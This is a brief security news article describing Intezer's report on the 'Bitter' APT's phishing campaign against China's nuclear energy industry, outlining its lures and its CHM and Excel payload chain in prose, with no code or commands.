Ionut Arghire
A South Asian advanced persistent threat (APT) actor has been targeting the nuclear energy sector in China in a recent cyberespionage campaign, Intezer reports.
Dubbed ‘Bitter’ and active since at least 2021, the group is known for the targeting of energy and government organizations in Bangladesh, China, Pakistan, and Saudi Arabia, and is characterized by the use of Excel exploits, and Microsoft Compiled HTML Help (CHM) and Windows Installer (MSI) files.
Continuing to target Chinese organizations, the group used updated first-stage payloads in the recently observed espionage campaign, added an extra layer of obfuscation, and employed additional decoys for social engineering.
The Bitter APT targeted recipients in China’s nuclear energy industry with at least seven phishing emails impersonating the embassy of Kyrgyzstan in China, inviting them to join conferences on relevant subjects.
The recipients were lured into downloading and opening an attached RAR archive containing CHM or Excel payloads designed to achieve persistence and fetch additional malware from the command-and-control (C&C) server.
Observed Excel payloads contained an Equation Editor exploit designed to set a scheduled task to download a next-stage EXE file, and another task to execute the payload.
CHM files, on the other hand, can be used to simply execute arbitrary code with low user interaction, even if a vulnerable iteration of Microsoft Office is not installed, and the Bitter APT used multiple such files in this campaign.
One of the identified variants creates a scheduled task to execute a remote MSI payload using msiexec. While investigating the attack chain, Intezer was only served empty MSI files, which the attackers could use for reconnaissance and which could be swapped with an actual payload if the target is deemed promising.
A second version of the CHM file was observed performing similar activity using an encoded PowerShell command stage.
“Bitter APT do not appear to change their tactics too much, therefore we can assume that the payloads will be similar to those observed in 2021, executing a downloader module that can be served with plugins such as a keylogger, remote access tool, file stealer, or browser credential stealer,” Intezer notes.
No comments:
Post a Comment